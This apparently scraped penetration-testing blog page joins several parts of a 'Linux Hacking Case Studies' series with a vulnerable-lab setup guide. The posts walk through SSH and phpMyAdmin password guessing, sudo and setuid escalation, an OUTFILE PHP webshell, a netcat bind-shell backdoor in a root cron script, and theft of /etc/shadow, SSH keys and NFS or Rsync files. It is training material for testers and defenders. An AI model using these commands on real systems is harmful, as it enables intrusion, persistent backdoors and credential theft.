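The soft link simply makes the phpMyAdmin files reachable under the webroot. A scratch sketch of the same operation using hypothetical /tmp paths:

```shell
# Stand-in directories for /usr/share/phpmyadmin and /var/www
mkdir -p /tmp/lndemo/share/phpmyadmin /tmp/lndemo/www

# Link the shared install into the webroot (-sfn makes the sketch rerunnable)
ln -sfn /tmp/lndemo/share/phpmyadmin /tmp/lndemo/www/phpmyadmin

# Confirm where the link points
readlink /tmp/lndemo/www/phpmyadmin
```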
Then, let's restart the required services:
service apache2 restart
service mysql restart
Next, let's add the admin user we'll be guessing later.
mysql -u root
use mysql;
CREATE USER 'admin'@'%' IDENTIFIED BY 'password';
GRANT ALL PRIVILEGES ON *.* TO 'admin'@'%' WITH GRANT OPTION;
exit
Finally, configure excessive privileges in the webroot just for fun:
cd /var/www/
chown -R www-data *
chmod -R 777 *
When it's all done, you should be able to verify the setup by logging into https://127.0.0.1/phpmyadmin as the "admin" user with a password of "password".

Create a World Writable Script

Next up, let's make a world writable script that will be executed by a cron job.
mkdir /scripts
echo "echo hello world" >> /scripts/rootcron.sh
chmod -R 777 /scripts
Create Root Cron Job

Now, let's configure a root cron job to execute the script every minute.
echo "* * * * * /scripts/rootcron.sh" > mycron
crontab mycron
You can then verify the cron job was added with the command below.
crontab -l
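For those new to cron, the five schedule fields in the entry are minute, hour, day-of-month, month, and day-of-week, so five asterisks means "every minute." A quick sketch that writes the same entry to a scratch file and counts its fields:

```shell
# Write the same entry to a scratch file (the real lab writes it to mycron)
echo "* * * * * /scripts/rootcron.sh" > /tmp/mycron_demo

# Five schedule fields plus the command path = 6 whitespace-separated fields
awk '{ print NF }' /tmp/mycron_demo
```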

Lab Setup: Sudoers

Attack Lab: Linux Hacking Case Study Part 4: Sudoers Horror Stories

This section outlines how to create a sudoers configuration that allows the execution of applications that can run arbitrary commands.

Create Encrypted Password

The command below will allow you to create an encrypted password for generating test users. I originally found this guidance at https://askubuntu.com/questions/94060/run-adduser-non-interactively.
openssl passwd -crypt test
Next you can add new users using the generated password below.  This is not required, but it's handy for scripting out environments.
useradd -m -p O1Fug755UcscQ -s /bin/bash test
useradd -m -p O1Fug755UcscQ -s /bin/bash user1
useradd -m -p O1Fug755UcscQ -s /bin/bash user2
useradd -m -p O1Fug755UcscQ -s /bin/bash user3
useradd -m -p O1Fug755UcscQ -s /bin/bash tempuser
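One caveat: the -crypt algorithm was removed in OpenSSL 3.0, so the openssl command above may fail on newer distros. A hedged alternative is a SHA-512 crypt hash, which useradd -p also accepts; the fixed salt below is only there to keep the sketch reproducible:

```shell
# Generate a SHA-512 crypt hash of "test" (salt "ab" chosen for reproducibility)
HASH=$(openssl passwd -6 -salt ab test)
echo "$HASH"

# The hash could then be used the same way (requires root, shown for context):
# useradd -m -p "$HASH" -s /bin/bash test
```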
Create an Insecure Sudoers Configuration

The sudoers configuration below will allow vi, nmap, python, and sh to be executed as root by test and user1.
echo "Cmnd_Alias ALLOWED_CMDS = /usr/bin/vi, /usr/bin/nmap, /usr/bin/python3.6, /usr/bin/python3.7, /usr/bin/sh" > /etc/sudoers
echo "test ALL=(ALL) NOPASSWD: ALLOWED_CMDS" >> /etc/sudoers
echo "user1 ALL=(ALL) NOPASSWD: ALLOWED_CMDS" >> /etc/sudoers
When it's all done, you can log in as the previously created test user to verify the sudo applications are available.

Wrap Up

In this blog we covered how to configure your own vulnerable Linux server so you can learn in a safe environment.  Hopefully the Linux Hacking Case Studies blog series was useful for those of you who are new to the security community.  Stay safe and hack responsibly!

Linux Hacking Case Studies Part 4: Sudo Horror Stories

This blog will cover different ways to approach SSH password guessing and attacking sudo applications to gain a root shell on a Linux system. This case study commonly makes appearances in CTFs, but the general approach for attacking weak passwords and sudo applications can be applied to many real world environments. This should be a fun walk through for people new to penetration testing.

This is the fourth of a five part blog series highlighting entry points and local privilege escalation paths commonly found on Linux systems during network penetration tests.

Below are links to the first three blogs in the series:

Below is an overview of what will be covered in this blog:

Finding SSH Servers

Before we can start password guessing or attacking sudo applications, we need to find some SSH servers to go after.  Luckily Nmap and similar port scanning tools make that pretty easy because most vendors still run SSH on the default port of 22.

Below is a sample Nmap command and screenshot to get you started.

nmap -sS -sV -p22 192.168.1.0/24 -oA sshscan

Once you’ve run the port scan you can quickly parse the results to make a file containing a list of SSH servers to target. Below is a command example and quick video to help illustrate.

grep -i "open" sshscan.gnmap
grep -i "open" sshscan.gnmap | awk '{print $2}' > ssh.txt
cat ssh.txt
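If you want to see the parsing in action without a live scan, you can run the same grep/awk pipeline against a fabricated, simplified .gnmap snippet (the IPs and banners below are made up):

```shell
# Fake (simplified) greppable Nmap output for three hosts
cat > /tmp/sshscan_demo.gnmap <<'EOF'
Host: 192.168.1.10 ()   Ports: 22/open/tcp//ssh//OpenSSH 7.9//
Host: 192.168.1.11 ()   Ports: 22/closed/tcp//ssh///
Host: 192.168.1.12 ()   Ports: 22/open/tcp//ssh//OpenSSH 8.2//
EOF

# Keep the "open" lines and print field 2 (the IP) to build the target list
grep -i "open" /tmp/sshscan_demo.gnmap | awk '{print $2}' > /tmp/ssh_demo.txt
cat /tmp/ssh_demo.txt
```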

Dictionary Attacks against SSH Servers

Password guessing is a pretty basic way to gain initial access to a Linux system, but that doesn’t mean it’s not effective.  We see default and weak SSH passwords configured in at least half of the environments we look at.

If you haven't done it before, below are a few tips to get you started.

  1. Perform additional scanning and fingerprinting against the target SSH server and try to determine if it’s a specific device. For example, determine if it is a known printer, switch, router, or other miscellaneous network device. In many cases, knowing that little piece of information can lead you to default device passwords and land you on the box.
  2. Based on the service fingerprinting, also try to determine if any applications are running on the system that create local user accounts that might be configured with default passwords.
  3. Lastly, try common username and password combinations. Please be careful with this approach if you don’t understand the account lockout policies though.  No one wants to have a bad day. 😊

Password Lists

In this scenario let’s assume we’re going to test for common username and password combinations.  That means we'll need a file containing a list of users and a file containing a list of passwords.  Kali ships with some good word lists that provide coverage for common usernames and passwords.  Many can be found in /usr/share/wordlists/.


While those can be handy, for this scenario we're going to create a few small custom lists.

Create users.txt File Containing:

echo user >> users.txt
echo root >> users.txt
echo test >> users.txt

Create passwords.txt File Containing:

echo Password >> passwords.txt
echo Password1 >> passwords.txt
echo toor >> passwords.txt
echo test >> passwords.txt

Password Guessing

Metasploit has modules that can be used to perform online dictionary attacks against most management protocols.  Most of those modules use the protocol_login naming standard, e.g. ssh_login.  Below is an example of the ssh_login module usage.

msfconsole
spool /root/ssh_login.log
use auxiliary/scanner/ssh/ssh_login
set USER_AS_PASS TRUE
set USER_FILE /root/users.txt
set PASS_FILE /root/passwords.txt
set rhosts file:///root/ssh.txt
set threads 100
set verbose TRUE
show options
run

Below is what it should look like if you successfully guess a password.


Here is a quick video example that shows the process of guessing passwords and gaining initial access with Metasploit.

Once you have identified a valid password you can also login using any ssh client.



Viewing Sudoers Execution Options

There are a lot of tools like Metasploit, LinEnum, Lynis, LinuxPrivCheck, UnixPrivsEsc, etc that can be used to help identify weak configurations that could be leveraged for privilege escalation, but we are going to focus on insecure sudoers configurations.

Sudoers is a configuration file in Linux that defines which commands can be run by which users.  It’s also commonly used to define commands that can be run as root by non-root users.

The sudo command below can be used to see what commands our user can run as root.

sudo -l

In this scenario, our user has the ability to run any command as root, but we’ll experiment with a few different command examples.

Exploiting Sudo sh

Unfortunately, we have seen this in a handful of real environments.  Allowing users to execute “sh” or any other shell through sudo provides full root access to the system.  Below is a basic example of dropping into a “sh” shell using sudo.

sudo sh


Exploiting Sudo VI

VI is a text editor that's installed by default in most Linux distros.  It’s popular with lots of developers. As a result, it’s semi-common to see developers provided with the ability to execute VI through sudo to facilitate the modification of privileged configuration files used in development environments.  Having the ability to modify any file on the system has its own risks, but VI actually has a built-in function that allows the execution of arbitrary commands.  That means that if you provide a user sudo access to VI, you have effectively provided them with root access to your server.

Below is a command example:

vi
ESC (press esc key)
:!whoami

Below are some example screenshots showing the process.


Exploiting Sudo Python

People also love Python.  It’s a scripting language used in every industry vertical and isn’t going away any time soon. It’s actually pretty rare to see Python or other programming engines broadly allowed to execute through sudo, but we have seen it a few times so I thought I’d share an example here.  Python, like most robust scripting and programming languages, supports arbitrary command execution capabilities by default.

Below is a basic command example and a quick video for the sake of illustration:

sudo python -c "import os; os.system('whoami')"

Here are a few quick video examples.

Exploiting Sudo Nmap

Most privilege escalation involves manipulating an application running as a higher privilege into running your code or commands.  One of the many techniques used by attackers is to simply leverage the native functionality of the target application. One common theme we see across many applications is the ability to create and load custom modules, plug-ins, or add-ons.

For the sake of this scenario, let's assume we can run Nmap using sudo and now we want to use its functionality to execute operating system commands.

When I see that an application like Nmap can be run through sudo, I typically follow a process similar to the one below:

  1. Does Nmap allow me to directly execute os commands?
    No (only in old versions, using the --interactive flag and !whoami)
  2. Does Nmap allow me to extend its functionality?
    Yes, it allows users to load and execute custom .nse modules.
  3. What programming language are the .nse modules written in?
    Nmap .nse modules use the LUA scripting engine.
  4. Does the LUA scripting engine support OS command execution?
    Yep. So let’s build a LUA module to execute operating system commands. It’s important to note that we could potentially write a module to execute shell code or call specific APIs, but in this example we'll keep it simple.

Let's assume at this point you spent a little time reviewing existing Nmap modules/LUA capabilities and developed the following .nse module.

--- SAMPLE SCRIPT
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local command  = stdnse.get_script_args(SCRIPT_NAME .. ".command") or nil
print("Command Output:")
local t = os.execute(command)
description = [[This is a basic script for executing os commands through a Nmap nse module (lua script).]]
---
-- @usage
-- nmap --script=./exec.nse --script-args='command=whoami'
-- @output
-- Output:
-- root
-- @args command
author = "Scott Sutherland"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "discovery", "safe"}
portrule = shortport.http
action = function(host,port)   
end

Once the module is copied to the target system, you can then run your custom module through Nmap. Below you can see the module successfully runs as our unprivileged user.

nmap --script=./exec.nse --script-args='command=whoami'
sudo nmap --script=./exec.nse --script-args='command=cat /etc/shadow'

Now, you can see we're able to run arbitrary commands in the root user's context, when running our new Nmap module through sudo.

So that’s the Nmap example. Also, for the fun of it, we occasionally configure ncat in sudoers when hosting CTFs, but to be honest I've never seen that in the real world. Either way, the video below shows both the Nmap and ncat scenarios.

Wrap Up

In this blog we talked about different ways to approach SSH password guessing and attacking sudo applications. I hope it was useful information for those new to the security community.  Good luck and hack responsibly!

Linux Hacking Case Studies Part 3: phpMyAdmin

This blog will walk-through how to attack insecure phpMyAdmin configurations and world writable files to gain a root shell on a Linux system. This case study commonly makes appearances in CTFs, but the general approach for attacking phpMyAdmin can be applied to many web applications. This should be a fun walk-through for people new to penetration testing, or those looking for a phpMyAdmin attack refresher.

This is the third of a five part blog series highlighting entry points and local privilege escalation paths commonly found on Linux systems during real network penetration tests.

Below are links to the first two blogs in the series:

Below is an overview of what will be covered in this blog:

What is phpMyAdmin?

phpMyAdmin is a web application that can be used to manage local MySQL databases. It’s commonly found in environments of all sizes and occasionally accessible directly from the internet. It's often used as part of open source projects and as a result some administrators don't realize that it's been installed in their environment. Developers also use it to temporarily spin up/down basic test environments, and we commonly see those turn into permanently unmanaged installations on corporate networks. Since we see phpMyAdmin so often, we thought it would be worth sharing a basic overview of how to use it to get a foothold on a system.
To get started, let's talk about finding phpMyAdmin instances.

Accessing NATed Environments

At the risk of adding unnecessary complexity to this scenario, we're going to assume that all of our tests are being conducted from a system that's in a NATed environment, meaning that we're connecting to an SSH server that is exposed to the internet through a firewall, while the environment we're attacking is on the other side of that firewall.

Finding phpMyAdmin

phpMyAdmin is a web application that’s usually hosted by Apache, but it can be hosted by other web servers.  Sometimes it’s installed in the web root directory,  but more commonly we see it installed off of the /phpMyAdmin path. For example, https://server/phpMyAdmin.

With this knowledge, let's start searching for web servers that might be hosting phpMyAdmin instances using our favorite port scanner, Nmap:

nmap -sT -sV -p80,443 192.168.1.0/24 -oA phpMyAdmin_scan

Next we can quickly search the phpMyAdmin_scan.gnmap output file for open ports with the command below:

grep -i "open" phpMyAdmin_scan.gnmap


We can see a few Apache instances. We can now target those to determine if phpMyAdmin is being hosted on the webroot or /phpMyAdmin path.

Since we are SSHing into a NATed environment, we are going to forward port 80 through an SSH tunnel to access the web server hosted on 192.168.1.171.  In most cases you won't have to do any port forwarding, but I thought it would be fun to cover the scenario. A detailed overview of SSH tunneling and SOCKS proxies is out of scope for this blog, but below is my attempt to illustrate what we're doing.


Below are a couple of options for SSH tunneling to the target web server.

Linux SSH Client

ssh pentest@ssh.servers.com -L 2222:192.168.1.171:80

Windows PuTTY Client

Once port forwarding is configured, we're able to access phpMyAdmin by navigating to https://127.0.0.1:2222/phpmyadmin in our local web browser.

Dictionary Attacks against PHPMyAdmin

Now that we've found a phpMyAdmin instance the next step is usually to test for default credentials, which are root:[blank].   For the sake of this lab we'll assume the default has been changed, but all is not lost.  From here we can conduct a basic dictionary attack to test for common user/password combinations without causing trouble.  However, you should always research the web application you're performing dictionary attacks against to ensure that you don't cause account lockouts.

There are a lot of great word lists out there, but for the sake of this scenario we kept it simple with the list below.

User List:

echo root >> /tmp/users.txt
echo admin >> /tmp/users.txt
echo user >> /tmp/users.txt

Password List:

echo password >> /tmp/passwords.txt
echo Password >> /tmp/passwords.txt

You can use a tool like Burp Intruder to conduct dictionary attacks against phpMyAdmin (and other web applications), but a nice article is already available on the topic here.  So to show an alternative we'll use Metasploit since it has a module built for the task.  Below are some commands to get you started.

Note: Metasploit is installed on the Kali Linux distribution by default.

msfconsole
use auxiliary/scanner/http/phpmyadmin_login
set rhosts 192.168.1.171
set USER_AS_PASS true
set targeturi /phpMyAdmin/index.php
set user_file /tmp/users.txt
set pass_file /tmp/passwords.txt
run

Below is a screenshot of what a successful dictionary attack looks like.


If the dictionary attack discovers valid credentials, you're ready to login and move onto the next step. Below is a short video showing the dictionary attack process using Metasploit.

Uploading WebShells through PHPMyAdmin

Now that we've guessed the password, the goal is to determine if there is any functionality that may allow us to execute operating system commands on the server.  MySQL supports user defined functions that could be used, but instead we're going to write a webshell to the webroot using the OUTFILE function.

Note: In most multi-tiered environments, writing a webshell to the webroot through SQL injection wouldn't work, because the database and web server are not hosted on the same system. phpMyAdmin is a bit of an exception in that regard; LAMP, WAMP, and XAMPP stacks are other examples. It's also worth noting that in some environments the MySQL service account may not have write access to the webroot or phpMyAdmin directories.

MySQL Code to Write a Webshell

To get started click the "SQL" button to view the query window.  Then execute the query below to upload the custom PHP webshell that can be used to execute commands on the operating system as the Apache service account. Remember that phpMyAdmin may not always be installed to /var/www/phpMyAdmin when executing this in real environments.

SELECT "<HTML><BODY><FORM METHOD=\"GET\" NAME=\"myform\" ACTION=\"\"><INPUT TYPE=\"text\" NAME=\"cmd\"><INPUT TYPE=\"submit\" VALUE=\"Send\"></FORM><pre><?php if($_GET['cmd']) { system($_GET['cmd']); } ?></pre></BODY></HTML>"

INTO OUTFILE '/var/www/phpMyAdmin/cmd.php'

The actual code can be downloaded here, but below is a screenshot showing it in context.


The webshell should now be available at https://127.0.0.1:2222/phpMyAdmin/cmd.php.  With that in hand we can start issuing OS commands and begin privilege escalation.
Below are a few commands to start with:

whoami
ls -al
ls /

Below is a quick video illustrating the process.

Note: When you're all done with your webshell make sure to remove it.  Also, consider adding authentication to your webshells so you're not opening up holes in client environments.

Locating World Writable Files

World-writable files and folders can be written to by any user.  They aren’t implicitly bad, but when those files are directly or indirectly executed by the root user they can be used to escalate privileges.

Finding World-Writable Files

Below is the command we'll run through our webshell to locate potentially exploitable world writable files.

find / -maxdepth 3 -type d -perm -777 2>/dev/null
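The same search can be rehearsed against a scratch directory tree if you want to see what -perm -777 actually matches (hypothetical /tmp paths; the real command walks / instead):

```shell
# Build one world-writable and one normal directory
mkdir -p /tmp/wwdemo/open /tmp/wwdemo/closed
chmod 755 /tmp/wwdemo /tmp/wwdemo/closed
chmod 777 /tmp/wwdemo/open

# -perm -777 requires ALL of rwxrwxrwx to be set, so only "open" matches
find /tmp/wwdemo -type d -perm -777
```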

From here we can start exploring some of the affected files and looking for potentially exploitable targets.

Exploiting a World Writable Root Cron Job Script

In our example below, the /scripts/ directory is world-writable.  It appears to contain a script that is run by a root cron job.  While this isn’t incredibly common, we have seen it in the wild.  The general idea can be applied to sudo scripts as well.  There are a lot of things we could write to the root cron job script, but for fun we are going to add a line to the script that will start a netcat listener as root.  Then we can connect to the listener from our Linux system.

Display Directory Listing for Scripts

ls /scripts
cat /scripts/rootcron.sh

Add Netcat Backdoor to Root’s Crontab Script

echo "nc -l -p 12345 -e /usr/bin/sh 2>/dev/null &" >> /scripts/rootcron.sh
cat /scripts/rootcron.sh
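If you want to sanity-check the append before touching a live host, here's the same operation reproduced against a scratch copy of the script (hypothetical /tmp paths):

```shell
# Recreate a stand-in for the world-writable cron script
mkdir -p /tmp/scripts_demo
echo "echo hello world" > /tmp/scripts_demo/rootcron.sh
chmod 777 /tmp/scripts_demo/rootcron.sh

# Append the netcat bind-shell line just like above
echo "nc -l -p 12345 -e /usr/bin/sh 2>/dev/null &" >> /tmp/scripts_demo/rootcron.sh
cat /tmp/scripts_demo/rootcron.sh
```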

You’ll have to wait for the cron job to trigger, but after that you should be able to connect to the netcat backdoor listening on port 12345 from the Linux system.

Below are a few commands you might want to try once connected:

nc 192.168.1.171 12345
whoami
pwd
cat /etc/shadow
w

I acknowledge that this seems like an exaggerated scenario, but sometimes reality is stranger than fiction. While this isn’t a common occurrence, we have seen very similar scenarios during real penetration tests.  For scenarios that require a reverse shell instead of a bind shell, pentestmonkey.net has a few documented options here.  However, below is a quick video showing the netcat backdoor installation and access.

Wrap Up

This blog illustrated one way to obtain a root shell on a remote Linux system using a vulnerable phpMyAdmin installation and a world writable script being executed by a root cron job. While there are many ways to reach the same end, I think the moral of this story is that web admin interfaces can be soft targets and often support functionality that can lead to command execution.  Also, performing web application discovery and maintenance is an important part of vulnerability management that is often overlooked. Hopefully this blog will be useful to new pentesters and defenders trying to better understand the potential impacts associated with insecurely configured web platforms like phpMyAdmin in their environments. Good luck and hack responsibly!

Linux Hacking Case Studies Part 2: NFS

This blog will walk through how to attack insecure NFS exports and setuid configurations in order to gain a root shell on a Linux system. This should be a fun overview for people new to penetration testing, or those looking for an NFS refresher. This is the second of a five part blog series highlighting entry points and local privilege escalation paths commonly found on Linux systems during real network penetration tests.  The first blog focused on attacking Rsync and can be found here.

Below is an overview of what will be covered in this blog:

What is NFS and Why Should I Care?

Network File System (NFS) is a clear text protocol that is used to transfer files between systems. So what’s the problem? Insecurely configured NFS servers are found during our internal network penetration tests about half of the time. The weak configurations often provide unauthorized access to sensitive data and sometimes the means to obtain a shell on the system. As you might imagine, the access we get is largely dependent on the NFS configuration.

Remotely accessing directories shared through NFS exports requires two things, mount access and file access.

  1. Mount access can be restricted by hostname or IP in /etc/exports, but in many cases no restrictions are applied.  It's also worth noting that IP and hostnames are easy to impersonate (assuming you know what to impersonate).
  2. File access is made possible by configuring exports in /etc/exports and labeling them as readable/writable. File access is then restricted by the connecting user's UID, which can be spoofed.  However, it should be noted that there are some mitigating controls such as "root squashing", that can be enabled in /etc/exports to prevent access from a UID of 0 (root).

The Major Issue with NFS

If it’s possible to mount NFS exports, the UID can usually be manipulated on the client system to bypass file permissions configured on the directory being made available via the NFS export. Access could also be accidentally given if the UID on the file and the UID of the connecting user are the same.

Below is an overview of how unintended access can occur:

  1. On “Server 1” there is a user named “user1” with a UID of 1111.
  2. User1 creates a file named “secret” that is only accessible to themselves and root using a command like “chmod 600 secret”.
  3. A read/write NFS export is then created on Server1 with no IP restrictions that maps to the directory containing user1’s secret file.
  4. On a separate Linux Client System, there is a user named “user2” that also has a UID of 1111.   When user2 mounts the NFS export hosted by Server1, they can read the secret file, because their UID matches the UID of the secret file’s owner (user1 on server1).
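The key point in step 4 is that Linux file permissions are enforced against numeric UIDs, not usernames. A quick local sketch (no NFS required) shows the raw numbers involved:

```shell
# Create a "secret" file locked down like user1's file in the scenario
echo "top secret" > /tmp/secret_demo
chmod 600 /tmp/secret_demo

# The owner is recorded as a numeric UID; over NFSv3, any client-side user
# presenting the same UID would pass this check
stat -c 'owner uid=%u mode=%a' /tmp/secret_demo
id -u
```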

Below is an attempt at illustrating the scenario.


Finding NFS Servers

NFS listens on UDP/TCP ports 111 and 2049.  Use common tools like nmap to identify open NFS ports.

nmap -sS -sU -p T:111,2049,U:111,2049 192.168.1.0/24 -oA nfs_scan
grep -i "open" nfs_scan.gnmap

Use common tools like nmap or rpcinfo to determine the versions of NFS currently supported. This may be important later: we want to force the use of version 3 or below so we can list the UIDs of file owners and impersonate them. If root squashing is enabled, that may be a requirement for file access.

Enumerate supported NFS versions with Nmap:

nmap -sV -p111,2049 192.168.1.171

Enumerate supported NFS versions with rpcinfo:

apt-get install nfs-common
rpcinfo -p 192.168.1.171

Below is a short video that shows the NFS server discovery process.

Enumerating NFS Exports

Now we want to list the available NFS exports on the remote server using Metasploit or showmount.

Metasploit example:

root@kali:~# msfconsole
msf > use auxiliary/scanner/nfs/nfsmount
msf auxiliary(nfsmount) > set rhosts 192.168.1.171
msf auxiliary(nfsmount) > run

Showmount example:

apt-get install nfs-common
showmount -e 192.168.1.171

Mounting NFS Exports

Now we want to mount the available NFS exports while running as root. Be sure to use the “-o vers=3” flag to ensure that you can view the UIDs of the file owners.  Below are some options for mounting the export.

mkdir demo
mount -o vers=3 192.168.1.171:/home demo
mount -o vers=3 192.168.1.222:/home demo -o nolock

or

mount -t nfs -o vers=3 192.168.1.171:/home demo

or

mount -t nfs4 -o proto=tcp,port=2049 192.168.1.171:/home demo

Viewing UIDs of NFS Exported Directories and Files

If you have full access to everything then root squashing may not be enabled. However, if you get access denied messages, then you’ll have to impersonate the UID of the file owner and remount the NFS export to get access (not covered in this blog).

List UIDs using mounted drive:

ls -an

List UIDs using nmap:

nmap --script=nfs-ls 192.168.1.171 -p 111

Searching for Passwords and Private Keys (User Access)

Alrighty, let’s assume you were able to access the NFS export as root or another user.  Now it’s time to try to find passwords and keys to access the remote server.  Private keys are typically found in /home/<user>/.ssh directories, but passwords are often all over the place.

Find files with “Password” in the name:

cd demo
find ./ -name "*password*"
cat ./test/password.txt
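The same find pattern can be rehearsed against a scratch tree (hypothetical paths and contents; the real search runs inside the mounted export):

```shell
# Fake a mounted-export layout containing a password file
mkdir -p /tmp/nfs_demo/test
echo "SuperSecret1" > /tmp/nfs_demo/test/password.txt

# Case-sensitive name match, same as above
find /tmp/nfs_demo -name "*password*"
cat /tmp/nfs_demo/test/password.txt
```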

Find private keys in .ssh directories:

mount 192.168.1.222:/ demo2/
cd demo2
find ./ -name "id_rsa"
cat ./root/.ssh/id_rsa

Below is a short video showing the whole mounting and file searching process.

Targeting Setuid (Getting Root Access)

Now that we have an interactive shell as a least privilege user (test), there are lots of privilege escalation paths we could take, but let's focus on setuid binaries for this round. Binaries can be configured with the setuid flag, which allows users to execute them as the binary's owner.  Similarly, binaries configured with the setgid flag allow users to execute them as the group associated with the file.  This can be a good and a bad thing for system administrators.

  • The Good news is that setuid binaries can be used to safely execute privileged commands such as passwd.
  • The Bad news is that setuid binaries can often be used for privilege escalation if they are owned by root and allow direct execution of arbitrary commands or indirect execution of arbitrary commands through plugins/modules.

Below are commands that can be used to search for setuid and setgid binaries.

Find Setuid Binaries

find / -perm -u=s -type f 2>/dev/null

Find Setgid Binaries

find / -perm -g=s -type f 2>/dev/null
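You can watch these find expressions work on scratch files; setting the setuid/setgid bits on your own files needs no root, and the bits are only dangerous when root owns the binary:

```shell
# Create two scratch files and set the special bits
touch /tmp/suid_demo_f /tmp/sgid_demo_f
chmod u+s,a+rx /tmp/suid_demo_f
chmod g+s,a+rx /tmp/sgid_demo_f

# Same expressions as above, scoped to /tmp for the demo
find /tmp -maxdepth 1 -type f -perm -u=s -name '*_demo_f' 2>/dev/null
find /tmp -maxdepth 1 -type f -perm -g=s -name '*_demo_f' 2>/dev/null
```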

Below is an example screenshot you might encounter during a pentest.


Once again, the goal is usually to get the binary to execute arbitrary code as root for you. In real world scenarios you'll likely have to do a little research or reversing of target setuid binaries in order to determine the best way to do that. In our case, the /home/test/exec binary allows us to directly execute OS commands as root. The source code for the example application can be found at https://github.com/nullbind/Other-Projects/blob/master/random/exec.c.

Below are the sample commands and a screenshot:

cd /home/test/
./exec
whoami

As you can see from the image above, it was possible to execute arbitrary commands as root without too much effort. Below is a video showing the whole setuid exploitation process in action.

Wrap Up

This blog illustrated one way to obtain a root shell on a remote Linux system using a vulnerable NFS export and an insecure setuid binary. While there are many ways to obtain the same end, I think the moral of the story is to make sure that all network share types are configured with least privilege to help prevent unauthorized access to data and systems. Hopefully this blog will be useful to new pentesters and defenders trying to better understand the potential impacts associated with insecurely configured NFS servers. Good luck and hack responsibly!

[post_title] => Linux Hacking Case Studies Part 2: NFS [post_excerpt] => This blog will walk through how to attack insecure NFS exports and setuid configurations in order to gain a root shell on a Linux system. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => linux-hacking-case-studies-part-2-nfs [to_ping] => [pinged] => [post_modified] => 2022-04-01 14:23:33 [post_modified_gmt] => 2022-04-01 19:23:33 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11309 [menu_order] => 517 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [27] => WP_Post Object ( [ID] => 11299 [post_author] => 17 [post_date] => 2020-03-23 07:00:05 [post_date_gmt] => 2020-03-23 07:00:05 [post_content] =>

This blog will walk through how to attack insecure Rsync configurations in order to gain a root shell on a Linux system. This should be a fun walkthrough for people new to penetration testing, or those looking for a Rsync refresher. This will be the first of a five-part blog series highlighting entry points and local privilege escalation paths commonly found on Linux systems during real network penetration tests.

Below is an overview of what will be covered in this blog:

What is RSYNC and Why Should I Care?

Rsync is a utility for transferring and synchronizing files between two servers (usually Linux).  It determines synchronization by checking file sizes and timestamps. So what's the problem?
Insecurely configured Rsync servers are found during our network penetration tests about a third of the time. The weak configurations often provide unauthorized access to sensitive data, and sometimes the means to obtain a shell on the system. As you might imagine, the access we get is largely dependent on the Rsync configuration.

Remotely accessing directories shared through Rsync requires two things: file share access and file permissions.

  1. File Share Access can be defined in /etc/rsyncd.conf to provide anonymous or authenticated access.
  2. File Permissions can also be defined in /etc/rsyncd.conf by defining the user that the Rsync service will run as. If Rsync is configured to run as root, then anyone allowed to connect can access the shared files with the privileges of the root user.

Below is an example rsyncd.conf file that allows anonymous root access to the entire file system:

motd file = /etc/rsyncd.motd
lock file = /var/run/rsync.lock
log file = /var/log/rsyncd.log
pid file = /var/run/rsyncd.pid

[files]
path = /
comment = Remote file share.
uid = 0
gid = 0
read only = no
list = yes

Finding RSYNC Servers

By default, the Rsync service listens on port 873. It’s often found configured without authentication or IP restrictions. You can discover Rsync services using tools like nmap.

nmap -sS -sV -p873 192.168.1.0/24 -oA Rsync_scan
grep -i "open" Rsync_scan.gnmap
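Once the scan completes, the grepable output can be reduced to just the hosts with 873 open. The sketch below hardcodes sample .gnmap lines (the hosts are made up) so the filtering can be demonstrated offline:

```shell
# Sample grepable nmap output; a real file would come from the -oA scan above
cat > Rsync_scan.gnmap <<'EOF'
Host: 192.168.1.171 ()  Ports: 873/open/tcp//rsync///
Host: 192.168.1.50 ()  Ports: 873/closed/tcp//rsync///
EOF

# Keep only hosts where 873 is open and extract the IP (second field)
open_hosts=$(grep "873/open" Rsync_scan.gnmap | awk '{print $2}')
```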

Enumerating RSYNC Shares

Below are commands that can be used to list the available directories and files.

List directory

rsync 192.168.1.171::

List subdirectory contents

rsync 192.168.1.171::files

List directories and files recursively

rsync -r 192.168.1.171::files/tmp/

Downloading Files via RSYNC

Below are commands that can be used to download the identified files via Rsync.  This makes it easy to pull down files containing passwords and sensitive data.

Download files

rsync 192.168.1.171::files/home/test/mypassword.txt .

Download folders

rsync -r 192.168.1.171::files/home/test/

Uploading Files via RSYNC

Below are commands that can be used to upload files using Rsync.  This can be handy for dropping scripts and binaries into folder locations where they will be automatically executed.

Upload files

rsync ./myfile.txt 192.168.1.171::files/home/test

Upload folders

rsync -r ./myfolder 192.168.1.171::files/home/test

Creating a New User through Rsync

If Rsync is configured to run as root and is anonymously accessible, it’s possible to create a new privileged Linux user by modifying the shadow, passwd, group, and sudoers files directly.

Note: The same general approach can be used for any vulnerability that provides full write access to the OS. A few other examples include NFS exports and uploading web shells running as root.

Creating the Home Directory
Let’s start by creating our new user’s home directory.

# Create local work directories
mkdir demo
mkdir backup
cd demo

# Create new user’s home directory
mkdir ./myuser
rsync -r ./myuser 192.168.1.171::files/home

Create the Shadow File Entry
The /etc/shadow file is the Linux password file that contains local users' encrypted passwords and password aging information. It is only accessible by root.

To inject a new user entry via Rsync you’ll have to:

  1. Generate a password.
  2. Create the line to inject.
  3. Download /etc/shadow. (and backup)
  4. Append the new user to the end of /etc/shadow
  5. Upload / Overwrite the existing /etc/shadow

Note: Make sure to create a new user that doesn’t already exist on the system. ;)

Create Encrypted Password:

openssl passwd -crypt password123
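Note that `-crypt` produces a legacy DES hash. Many modern systems expect SHA-512 ($6$) entries in /etc/shadow; assuming OpenSSL 1.1.1 or newer is available, the `-6` option with a fixed salt gives a reproducible modern hash instead:

```shell
# SHA-512 crypt hash; the fixed salt makes the output reproducible
# (omit -salt to get a random salt, which is what you'd normally want)
hash=$(openssl passwd -6 -salt saltsalt password123)
echo "$hash"
```

Whichever format you generate, the hash simply replaces the second field of the shadow entry shown below.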

Add New User Entry to /etc/shadow:

rsync -R 192.168.1.171::files/etc/shadow .
cp ./etc/shadow ../backup
echo "myuser:MjHKz4C0Z0VCI:17861:0:99999:7:::" >> ./etc/shadow
rsync ./etc/shadow 192.168.1.171::files/etc/

Create Passwd File Entry
The /etc/passwd file is used to keep track of registered users that have access to the system. It does not contain encrypted passwords. It can be read by all users.

To inject a new user entry via Rsync you’ll have to:

